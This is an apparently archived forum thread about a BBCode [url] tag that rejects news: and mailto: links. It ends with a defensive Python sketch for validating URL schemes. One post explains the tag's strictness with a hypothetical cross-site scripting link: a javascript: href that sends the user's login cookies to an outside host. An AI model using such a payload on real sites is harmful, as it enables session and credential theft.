[url] tag doesn't recognize news: URLs

blargg
Regular
Posts: 327
Joined: Thu Jun 30, 2005 1:54 pm
Location: USA
Contact:

Post by blargg »

The tag doesn't recognize URLs using the n ... ample.com/
https://example.com/
ftp://example.com/
[url=news:alt.test]news:alt.test[/url] (see section 3.6 of RFC 1738)
[url=news:foo@bar]news:foo@bar[/url]

Pretty ironic, given that USENET is the biggest discussion forum in existence...
funkyass
"God"
Posts: 1128
Joined: Tue Jul 27, 2004 11:24 pm

Post by funkyass »

blarg, it's news://

it's a URI dude.
Does [Kevin] Smith masturbate with steel wool too?

- Yes, but don’t change the subject.
grinvader
ZSNES Shake Shake Prinny
Posts: 5632
Joined: Wed Jul 28, 2004 4:15 pm
Location: PAL50, dood !

Post by grinvader »

For a bypass, use a tinyurl in the tag.
Everyone shut up and follow me!!

<jmr> bsnes has the most accurate wiki page but it takes forever to load (or something)
Pantheon: Gideon Zhi | CaitSith2 | Nach | kode54
blargg
Regular
Posts: 327
Joined: Thu Jun 30, 2005 1:54 pm
Location: USA
Contact:

Post by blargg »

funkyass wrote:blarg, it's news://
it's a URI dude.
Dude, did you even read the RFC I linked to?

Code: Select all

3.6. NEWS

   The news URL scheme is used to refer to either news groups or
   individual articles of USENET news, as specified in RFC 1036.

   A news URL takes one of two forms:

     news:<newsgroup-name>
     news:<message-id>

Just for reference, here's http and mailto:

Code: Select all

3.3. HTTP

   The HTTP URL scheme is used to designate Internet resources
   accessible using HTTP (HyperText Transfer Protocol).

   The HTTP protocol is specified elsewhere. This specification only
   describes the syntax of HTTP URLs.

   An HTTP URL takes the form:

      http://<host>:<port>/<path>?<searchpart>

[...]

3.5. MAILTO

   The mailto URL scheme is used to designate the Internet mailing
   address of an individual or service. No additional information other
   than an Internet mailing address is present or implied.

   A mailto URL takes the form:

        mailto:<rfc822-addr-spec>
[...]

[url=mailto:example@example.com]mailto:example@example.com[/url] (looks like mailto doesn't work either)

Looking at the RFC for a URI, I don't see anything that changes how news resource links are encoded.
Tallgeese
Justice is Blind
Posts: 620
Joined: Wed Jul 28, 2004 3:33 pm
Location: Test
Contact:

Post by Tallgeese »

URL tag parsers have the nasty habit of automatically inserting http:// at the start if they don't see it.

They do this so the forum doesn't confuse something like www.blah.net as a relative link.

They'd have to change the PHP files to fix that.
blargg
Regular
Posts: 327
Joined: Thu Jun 30, 2005 1:54 pm
Location: USA
Contact:

Post by blargg »

The ftp:// link example in my first post works fine, without http:// being inserted. It looks more like the code that determines whether the [url= tag is valid requires that it have a double slash near the beginning of the URL, even though the format seems more along the lines of <protocol>:<protocol-specific string>.
kode54
Zealot
Posts: 1140
Joined: Wed Jul 28, 2004 3:31 am
Contact:

Post by kode54 »

There's a separate [email] tag for mailto: links. Formatted [email]user@host[/email]. Also, the BBCode documentation is wrong on the [email] tag, its example link is an emailto: address, which is invalid.
Tallgeese
Justice is Blind
Posts: 620
Joined: Wed Jul 28, 2004 3:33 pm
Location: Test
Contact:

Post by Tallgeese »

I honestly don't understand why URL BBcode checks for http:// or ftp:// or what have you.

I mean, if they screw it up, let them screw it up.
blargg
Regular
Posts: 327
Joined: Thu Jun 30, 2005 1:54 pm
Location: USA
Contact:

Post by blargg »

Just to be clear, I'm not commenting on automatic conversion of URLs to links, which I too don't really care for, since it clutters the text with the full URL. I'm commenting on explicit use of the tag, and how it fails to work with URLs ... ]some text into <a href="....">some text</a>.
Tallgeese
Justice is Blind
Posts: 620
Joined: Wed Jul 28, 2004 3:33 pm
Location: Test
Contact:

Post by Tallgeese »

The reason it doesn't blindly convert is because it is possible to insert javascript that way, just so you know.
grinvader
ZSNES Shake Shake Prinny
Posts: 5632
Joined: Wed Jul 28, 2004 4:15 pm
Location: PAL50, dood !

Post by grinvader »

Note that we could enable html for users, but I was around back in the "goatse on hover" days and I don't really want it to happen again.
Tallgeese
Justice is Blind
Posts: 620
Joined: Wed Jul 28, 2004 3:33 pm
Location: Test
Contact:

Post by Tallgeese »

grinvader wrote:Note that we could enable html for users, but I was around back in the "goatse on hover" days and I don't really want it to happen again.
Er... do you mean hovering on top of links that are goatse?
sweener2001
Inmate
Posts: 1751
Joined: Mon Dec 06, 2004 7:47 am
Location: WA

Post by sweener2001 »

that scarred me
byuu

Post by byuu »

grinvader wrote:Note that we could enable html for users, but I was around back in the "goatse on hover" days and I don't really want it to happen again.
Ever see the spawning popup variation? Click a link, get a shock image popup. Close the window and it spawns two more. Close one of those, you get the idea.

I feel really bad for those who didn't know how to end task a process.
adventure_of_link
Locksmith of Hyrule
Posts: 3634
Joined: Sun Aug 08, 2004 7:49 am
Location: 255.255.255.255
Contact:

Post by adventure_of_link »

I thought it was because people kept inserting HTML code to force an auto redirection to goatse in X seconds. :? that, and changing the title of the page (in your titlebar on the web browser that is.) :?

in any case, I believe the HTML inserts have been improved to only allow things like <embed></embed>, <a href="url heer">hyperlink</a>, <img src="image url heer"></img>

etc etc etc.
<Nach> so why don't the two of you get your own room and leave us alone with this stupidity of yours?
NSRT here.
grinvader
ZSNES Shake Shake Prinny
Posts: 5632
Joined: Wed Jul 28, 2004 4:15 pm
Location: PAL50, dood !

Post by grinvader »

Sadly, it's either full html abuse or none. And none it is.
Metatron wrote:Er... do you mean hovering on top of links that are goatse?
No, goatse popups on hover.
Gil_Hamilton
Buzzkill Gil
Posts: 4294
Joined: Wed Jan 12, 2005 7:14 pm

Post by Gil_Hamilton »

adventure_of_link wrote:I thought it was because people kept inserting HTML code to force an auto redirection to goatse in X seconds. :? that, and changing the title of the page (in your titlebar on the web browser that is.) :?
If I recall correctly...

In OUR case, it was disabled after a thread created to test the limits of HTML within Ikonboard, I believe it was. The purple board that replaced ye olde WWWBoard.

The thread in question went from a thread with an embedded Zero Wing video to an incomprehensible mess of out-of-order posts, posts to the side of each other, posts on top of each other, posts overlapping each other, images every which way, with over a dozen copies of the Zero Wing video embedded, along with God knows whatever else.

HTML in posts was disabled within a day, as the fact that it was an INCREDIBLY bad idea was illustrated quite effectively.


Looking back, I truly wish I had saved the thread.
grinvader
ZSNES Shake Shake Prinny
Posts: 5632
Joined: Wed Jul 28, 2004 4:15 pm
Location: PAL50, dood !

Post by grinvader »

You forgot "whole posts in their own title field".
blargg
Regular
Posts: 327
Joined: Thu Jun 30, 2005 1:54 pm
Location: USA
Contact:

Post by blargg »

Metatron wrote:The reason it doesn't blindly convert is because it is possible to insert javascript that way, just so you know.
So someone could insert a link that was <a href="javascript:...">? How is that any different than a link to another page which has said javascript on it? Either way, the link must be clicked to activate it. Obviously the [url=...] tag must not accept quotes or ] within the ... string, but that's just to ensure it generates valid HTML from a [url] tag.
byuu

Post by byuu »

blargg wrote:So someone could insert a link that was <a href="javascript:...">? How is that any different than a link to another page which has said javascript on it?
Javascript on the current domain exposes you to cross-site scripting vulnerabilities.

Hypothetical:
<a href="javascript:redirectTo('http://dood.dyndns.org/?logdata=' + document.cookie('PHP_USER') + '=' + document.cookie('PHP_PASS') + '\n');">Click me</a>

Sure, it's a hash, but dictionary attacks are trivial on those.

We had someone try something similar on jumpstation.org (when it still existed.)
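
Added example (not part of the thread, and not the forum software's code): a Python sketch of the [url=...] validation the posts above argue about. It checks the scheme against an allowlist using RFC 1738's <scheme>:<scheme-specific-part> form instead of looking for "//", so news: and mailto: links render while a javascript: link stays inert text. The allowlist, the function names and the sample posts are assumptions made for illustration.

```python
import html
import re

# Assumption: the schemes this hypothetical forum chooses to link.
ALLOWED_SCHEMES = {"http", "https", "ftp", "news", "mailto"}

# RFC 1738 section 2.1: <scheme>:<scheme-specific-part>; scheme is case-insensitive.
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):(.+)$")
# Never accepted inside the URL: controls, space, quotes, angle brackets, backslash.
FORBIDDEN_RE = re.compile(r"[\x00-\x20\x7f\"'<>\\]")
URL_TAG_RE = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.I | re.S)


def double_slash_check(url):
    """The validation blargg guesses at in the thread: a scheme followed by '//'."""
    return re.match(r"^[A-Za-z][A-Za-z0-9+.\-]*://", url) is not None


def safe_href(url):
    """Return the URL with a lower-cased scheme if it is allowlisted, else None."""
    if FORBIDDEN_RE.search(url):
        return None
    if url.lower().startswith("www."):
        # The habit Tallgeese describes: a bare host name gets http:// prepended.
        url = "http://" + url
    m = SCHEME_RE.match(url)
    if not m or m.group(1).lower() not in ALLOWED_SCHEMES:
        return None
    return m.group(1).lower() + ":" + m.group(2)


def render_url_tags(post):
    """HTML-escape the whole post, then link only [url=...] tags that validate."""
    def repl(m):
        href = safe_href(html.unescape(m.group(1)))
        if href is None:
            return m.group(0)  # stays as inert, already-escaped text
        return '<a href="{}" rel="nofollow">{}</a>'.format(
            html.escape(href, quote=True), m.group(2))
    return URL_TAG_RE.sub(repl, html.escape(post, quote=True))


if __name__ == "__main__":
    # Constructed sample posts.
    for sample in ("[url=news:alt.test]group[/url]",
                   "[url=JavaScript:void(0)]click[/url]",
                   '[url=http://example.com/" onmouseover="x]hi[/url]'):
        print(render_url_tags(sample))
```
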